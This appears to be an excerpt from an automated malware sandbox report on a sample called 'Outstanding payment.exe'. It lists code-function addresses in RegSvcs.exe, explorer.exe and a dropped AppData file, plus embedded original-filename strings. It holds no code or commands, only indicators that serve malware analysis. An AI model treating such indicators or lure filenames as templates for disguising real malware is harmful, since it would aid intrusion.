Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2A45	9_2_015E2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EED7A	9_2_015EED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EAD00	9_2_015EAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E8DC0	9_2_015E8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F8DBF	9_2_015F8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0C00	9_2_015E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0CF2	9_2_015D0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654F40	9_2_01654F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01622F28	9_2_01622F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01600F30	9_2_01600F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2FC8	9_2_015D2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165EFA0	9_2_0165EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0E59	9_2_015E0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2ED9	9_2_015F2ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0161516C	9_2_0161516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CF172	9_2_015CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EB1B0	9_2_015EB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E33F3	9_2_015E33F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FD2F0	9_2_015FD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E52A0	9_2_015E52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016274E0	9_2_016274E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E3497	9_2_015E3497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EB730	9_2_015EB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E9950	9_2_015E9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FB950	9_2_015FB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D1979	9_2_015D1979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E59DA	9_2_015E59DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164D800	9_2_0164D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E38E0	9_2_015E38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01655BF0	9_2_01655BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0161DBF9	9_2_0161DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FFB80	9_2_015FFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01653A6C	9_2_01653A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E3D40	9_2_015E3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FFDC0	9_2_015FFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01659C32	9_2_01659C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F9C20	9_2_015F9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E1F92	9_2_015E1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E9EB0	9_2_015E9EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_0E851232	10_2_0E851232
Source: C:\Windows\explorer.exe	Code function: 10_2_0E84BB30	10_2_0E84BB30
Source: C:\Windows\explorer.exe	Code function: 10_2_0E84BB32	10_2_0E84BB32
Source: C:\Windows\explorer.exe	Code function: 10_2_0E847082	10_2_0E847082
Source: C:\Windows\explorer.exe	Code function: 10_2_0E850036	10_2_0E850036
Source: C:\Windows\explorer.exe	Code function: 10_2_0E8545CD	10_2_0E8545CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0E848D02	10_2_0E848D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0E84E912	10_2_0E84E912
Source: C:\Windows\explorer.exe	Code function: 10_2_10DDC082	10_2_10DDC082
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE5036	10_2_10DE5036
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE95CD	10_2_10DE95CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE3912	10_2_10DE3912
Source: C:\Windows\explorer.exe	Code function: 10_2_10DDDD02	10_2_10DDDD02
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE6232	10_2_10DE6232
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE0B32	10_2_10DE0B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE0B30	10_2_10DE0B30
Source: C:\Windows\explorer.exe	Code function: 10_2_118AD232	10_2_118AD232
Source: C:\Windows\explorer.exe	Code function: 10_2_118B05CD	10_2_118B05CD
Source: C:\Windows\explorer.exe	Code function: 10_2_118A4D02	10_2_118A4D02
Source: C:\Windows\explorer.exe	Code function: 10_2_118AA912	10_2_118AA912
Source: C:\Windows\explorer.exe	Code function: 10_2_118A7B32	10_2_118A7B32
Source: C:\Windows\explorer.exe	Code function: 10_2_118A7B30	10_2_118A7B30
Source: C:\Windows\explorer.exe	Code function: 10_2_118A3082	10_2_118A3082
Source: C:\Windows\explorer.exe	Code function: 10_2_118AC036	10_2_118AC036
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031925C1	11_2_031925C1
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031913C8	11_2_031913C8
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031991C4	11_2_031991C4
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03193470	11_2_03193470
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03191C08	11_2_03191C08
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0319C39B	11_2_0319C39B
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031943B0	11_2_031943B0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031943C0	11_2_031943C0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031920D2	11_2_031920D2
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0319C400	11_2_0319C400
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03190870	11_2_03190870
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03194F08	11_2_03194F08
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0319CE93	11_2_0319CE93
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0319CED3	11_2_0319CED3
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03194EF9	11_2_03194EF9
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0319134B	11_2_0319134B
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03195210	11_2_03195210
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031957B0	11_2_031957B0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031957A2	11_2_031957A2
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03195610	11_2_03195610
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03195600	11_2_03195600
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0319345B	11_2_0319345B
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031959D8	11_2_031959D8
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031959CA	11_2_031959CA
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_05306468	11_2_05306468
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_053004AF	11_2_053004AF
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_053004C0	11_2_053004C0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_053077C0	11_2_053077C0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_05300E70	11_2_05300E70
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_08976674	11_2_08976674
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_08979188	11_2_08979188
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B567B18	11_2_0B567B18
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B560AD0	11_2_0B560AD0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B565C00	11_2_0B565C00
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B567268	11_2_0B567268
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5661A0	11_2_0B5661A0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B560040	11_2_0B560040
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B562098	11_2_0B562098
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5657C0	11_2_0B5657C0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5616E0	11_2_0B5616E0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B563589	11_2_0B563589
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B561B19	11_2_0B561B19
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B567B08	11_2_0B567B08
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B561B28	11_2_0B561B28
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B565BF1	11_2_0B565BF1
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B566A99	11_2_0B566A99
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B564910	11_2_0B564910
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B564920	11_2_0B564920
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B56F870	11_2_0B56F870
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B56EFF0	11_2_0B56EFF0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B564FB0	11_2_0B564FB0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B564FA0	11_2_0B564FA0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B565E48	11_2_0B565E48
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B565E39	11_2_0B565E39
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B563D70	11_2_0B563D70
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B563D61	11_2_0B563D61
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B567258	11_2_0B567258
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B568108	11_2_0B568108
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5651D0	11_2_0B5651D0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5651C0	11_2_0B5651C0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B566190	11_2_0B566190
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B56001E	11_2_0B56001E
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5680FA	11_2_0B5680FA
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B562089	11_2_0B562089
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5657B0	11_2_0B5657B0
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5616D1	11_2_0B5616D1
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5665D8	11_2_0B5665D8
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B5665E8	11_2_0B5665E8
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B565448	11_2_0B565448
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B565438	11_2_0B565438
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B56F428	11_2_0B56F428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00401030	15_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041EAC3	15_2_0041EAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041E524	15_2_0041E524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041D580	15_2_0041D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00402D90	15_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00409E50	15_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00409E0A	15_2_00409E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041EFDF	15_2_0041EFDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00402FB0	15_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01698158	15_2_01698158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01600100	15_2_01600100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016AA118	15_2_016AA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C81CC	15_2_016C81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016D01AA	15_2_016D01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016A2000	15_2_016A2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CA352	15_2_016CA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016D03E6	15_2_016D03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0161E3F0	15_2_0161E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016B0274	15_2_016B0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016902C0	15_2_016902C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01610535	15_2_01610535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016D0591	15_2_016D0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C2446	15_2_016C2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016BE4F6	15_2_016BE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01610770	15_2_01610770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01634750	15_2_01634750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0160C7C0	15_2_0160C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0162C6E0	15_2_0162C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01626962	15_2_01626962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016129A0	15_2_016129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016DA9A6	15_2_016DA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0161A840	15_2_0161A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01612840	15_2_01612840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0163E8F0	15_2_0163E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_015F68B8	15_2_015F68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CAB40	15_2_016CAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C6BD7	15_2_016C6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0160EA80	15_2_0160EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0161AD00	15_2_0161AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0160ADE0	15_2_0160ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01628DBF	15_2_01628DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01610C00	15_2_01610C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01600CF2	15_2_01600CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016B0CB5	15_2_016B0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01684F40	15_2_01684F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01652F28	15_2_01652F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01630F30	15_2_01630F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0161CFE0	15_2_0161CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01602FC8	15_2_01602FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0168EFA0	15_2_0168EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01610E59	15_2_01610E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CEE26	15_2_016CEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CEEDB	15_2_016CEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01622E90	15_2_01622E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CCE93	15_2_016CCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016DB16B	15_2_016DB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0164516C	15_2_0164516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_015FF172	15_2_015FF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0161B1B0	15_2_0161B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C70E9	15_2_016C70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CF0E0	15_2_016CF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016170C0	15_2_016170C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016BF0CC	15_2_016BF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_015FD34C	15_2_015FD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C132D	15_2_016C132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0165739A	15_2_0165739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016B12ED	15_2_016B12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0162B2C0	15_2_0162B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016152A0	15_2_016152A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C7571	15_2_016C7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016AD5B0	15_2_016AD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01601460	15_2_01601460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CF43F	15_2_016CF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CF7B0	15_2_016CF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C16CC	15_2_016C16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01619950	15_2_01619950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0162B950	15_2_0162B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016A5910	15_2_016A5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0167D800	15_2_0167D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016138E0	15_2_016138E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CFB76	15_2_016CFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01685BF0	15_2_01685BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0164DBF9	15_2_0164DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0162FB80	15_2_0162FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01683A6C	15_2_01683A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CFA49	15_2_016CFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C7A46	15_2_016C7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016BDAC6	15_2_016BDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01655AA0	15_2_01655AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016ADAAC	15_2_016ADAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C7D73	15_2_016C7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01613D40	15_2_01613D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016C1D5A	15_2_016C1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0162FDC0	15_2_0162FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01689C32	15_2_01689C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CFCF2	15_2_016CFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CFF09	15_2_016CFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016CFFB1	15_2_016CFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01611F92	15_2_01611F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01619EB0	15_2_01619EB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01627E54 appears 97 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0168F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 015FB970 appears 275 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01645130 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0167EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0164EA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01657E54 appears 100 times

Source: Outstanding payment.exe, 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Outstanding payment.exe
Source: Outstanding payment.exe, 00000000.00000000.2060151617.0000000000612000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVlWL.exe" vs Outstanding payment.exe
Source: Outstanding payment.exe, 00000000.00000002.2110202228.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Outstanding payment.exe
Source: Outstanding payment.exe, 00000000.00000002.2117960305.0000000007950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Outstanding payment.exe
Source: Outstanding payment.exe, 00000000.00000002.2119057847.0000000009B20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Outstanding payment.exe
